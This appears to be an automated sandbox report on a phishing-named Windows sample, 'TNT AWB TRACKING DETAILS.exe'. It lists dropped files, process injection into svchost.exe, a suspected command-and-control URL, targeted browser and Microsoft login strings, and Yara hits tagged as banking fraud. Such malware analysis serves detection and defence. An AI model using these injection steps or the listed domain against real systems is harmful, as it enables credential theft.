Date: Tue, 17 Dec 2024 17:39:57 GMT
Server: Apache/2.4.6 (CentOS) PHP/7.2.34
Content-Length: 203
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ir1u/ was not found on this server.</p></body></html>

Source: global traffic, HTTP traffic detected:
HTTP/1.1 404 Not Found
Date: Tue, 17 Dec 2024 17:40:04 GMT
Server: Apache
Content-Length: 389
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                    Source: bRQIkEscRm.exe, 00000009.00000002.3369010830.0000000000FB2000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.martmall.info
                    Source: bRQIkEscRm.exe, 00000009.00000002.3369010830.0000000000FB2000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.martmall.info/mnch/
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                    Source: mobsync.exe, 0000000A.00000003.2856653205.0000000008286000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=7
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srfC
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srfR
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: mobsync.exe, 0000000A.00000002.3366789394.0000000003308000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                    Source: mobsync.exe, 0000000A.00000002.3373591249.00000000082A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F34164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | Code function: 2_2_00234164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F33F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F2001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F4CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | Code function: 2_2_0024CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                    E-Banking Fraud

                    Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000A.00000002.3370359960.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.3370703283.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2674996160.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.3369010830.0000000000F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.3371766946.0000000004A60000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2680764092.0000000006000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000006.00000002.2686142507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000A.00000002.3366041781.0000000002FB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.2667870776.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                    System Summary

                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00EC3B3A This is a third-party compiled AutoIt script.
                    Source: TNT AWB TRACKING DETAILS.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000000.2122041569.0000000000F74000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. [memstr_ad38727a-0]
                    Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000000.2122041569.0000000000F74000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` [memstr_7372f8e5-9]
                    Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.2134680187.0000000004273000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. [memstr_81adc8bc-2]
                    Source: TNT AWB TRACKING DETAILS.exe, 00000000.00000003.2134680187.0000000004273000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` [memstr_e53bcdde-f]
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | Code function: 2_2_001C3B3A This is a third-party compiled AutoIt script.
                    Source: jailkeeper.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: jailkeeper.exe, 00000002.00000000.2135018752.0000000000274000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. [memstr_e4110dfc-d]
                    Source: jailkeeper.exe, 00000002.00000000.2135018752.0000000000274000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` [memstr_3111ad60-1]
                    Source: jailkeeper.exe, 00000005.00000002.2306695958.0000000000274000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. [memstr_0007d66e-d]
                    Source: jailkeeper.exe, 00000005.00000002.2306695958.0000000000274000.00000002.00000001.01000000.00000004.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` [memstr_cd7c8075-f]
                    Source: TNT AWB TRACKING DETAILS.exe | String found in binary or memory: This is a third-party compiled AutoIt script. [memstr_230423c5-7]
                    Source: TNT AWB TRACKING DETAILS.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` [memstr_0be59192-4]
                    Source: jailkeeper.exe.0.dr | String found in binary or memory: This is a third-party compiled AutoIt script. [memstr_af66105d-d]
                    Source: jailkeeper.exe.0.dr | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` [memstr_cedc31a1-6]
                    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0042C613 NtClose
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72B60 NtClose,LdrInitializeThunk
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B735C0 NtCreateMutant,LdrInitializeThunk
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B74340 NtSetContextThread
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B74650 NtSuspendThread
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72BA0 NtEnumerateValueKey
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72B80 NtQueryInformationFile
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72BF0 NtAllocateVirtualMemory
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72BE0 NtQueryValueKey
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72AB0 NtWaitForSingleObject
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72AF0 NtWriteFile
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72AD0 NtReadFile
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72FB0 NtResumeThread
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72FA0 NtQuerySection
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72F90 NtProtectVirtualMemory
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72FE0 NtCreateFile
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72F30 NtCreateSection
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72F60 NtCreateProcessEx
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72EA0 NtAdjustPrivilegesToken
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72E80 NtReadVirtualMemory
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72EE0 NtQueueApcThread
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72E30 NtWriteVirtualMemory
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72DB0 NtEnumerateKey
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72DD0 NtDelayExecution
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72D30 NtUnmapViewOfSection
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72D10 NtMapViewOfSection
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72D00 NtSetInformationFile
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72CA0 NtQueryInformationToken
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72CF0 NtOpenProcess
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72CC0 NtQueryVirtualMemory
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72C00 NtQueryInformationProcess
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72C70 NtFreeVirtualMemory
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B72C60 NtCreateKey
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B73090 NtSetValueKey
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B73010 NtOpenDirectoryObject
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B739B0 NtGetContextThread
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B73D10 NtOpenProcessToken
                    Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03B73D70 NtOpenThread
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F2A1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F18310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_00F251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe | Code function: 2_2_002251BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ECE6A00_2_00ECE6A0
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EED9750_2_00EED975
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ECFCE00_2_00ECFCE0
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE21C50_2_00EE21C5
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF62D20_2_00EF62D2
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F403DA0_2_00F403DA
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF242E0_2_00EF242E
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE25FA0_2_00EE25FA
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED66E10_2_00ED66E1
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F1E6160_2_00F1E616
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF878F0_2_00EF878F
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F288890_2_00F28889
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F408570_2_00F40857
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF68440_2_00EF6844
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED88080_2_00ED8808
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EECB210_2_00EECB21
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF6DB60_2_00EF6DB6
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED6F9E0_2_00ED6F9E
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED30300_2_00ED3030
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EEF1D90_2_00EEF1D9
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE31870_2_00EE3187
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EC12870_2_00EC1287
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE14840_2_00EE1484
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED55200_2_00ED5520
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE76960_2_00EE7696
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED57600_2_00ED5760
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE19780_2_00EE1978
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EF9AB50_2_00EF9AB5
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00F47DDB0_2_00F47DDB
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EEBDA60_2_00EEBDA6
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00EE1D900_2_00EE1D90
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ED3FE00_2_00ED3FE0
                    Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00ECDF000_2_00ECDF00
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001CE6A02_2_001CE6A0
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001ED9752_2_001ED975
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001CFCE02_2_001CFCE0
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E21C52_2_001E21C5
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001F62D22_2_001F62D2
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_002403DA2_2_002403DA
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001F242E2_2_001F242E
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E25FA2_2_001E25FA
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_0021E6162_2_0021E616
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D66E12_2_001D66E1
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001F878F2_2_001F878F
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D88082_2_001D8808
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001F68442_2_001F6844
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_002408572_2_00240857
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_002288892_2_00228889
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001ECB212_2_001ECB21
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001F6DB62_2_001F6DB6
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D6F9E2_2_001D6F9E
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D30302_2_001D3030
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E31872_2_001E3187
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001EF1D92_2_001EF1D9
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001C12872_2_001C1287
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E14842_2_001E1484
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D55202_2_001D5520
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E76962_2_001E7696
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D57602_2_001D5760
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E19782_2_001E1978
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001F9AB52_2_001F9AB5
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001E1D902_2_001E1D90
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001EBDA62_2_001EBDA6
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_00247DDB2_2_00247DDB
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001CDF002_2_001CDF00
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_001D3FE02_2_001D3FE0
                    Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exeCode function: 2_2_015D36C02_2_015D36C0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00418583
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00410033
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040E0B3
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040290C
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00402910
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004011D0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00403240
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040E28B
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0042EC33
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00401CE0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004045E4
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_0040259B
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00402D9D
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00402DA0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_004025A0
                    Source: C:\Windows\SysWOW64\svchost.exe Code function: 3_2_00401E73
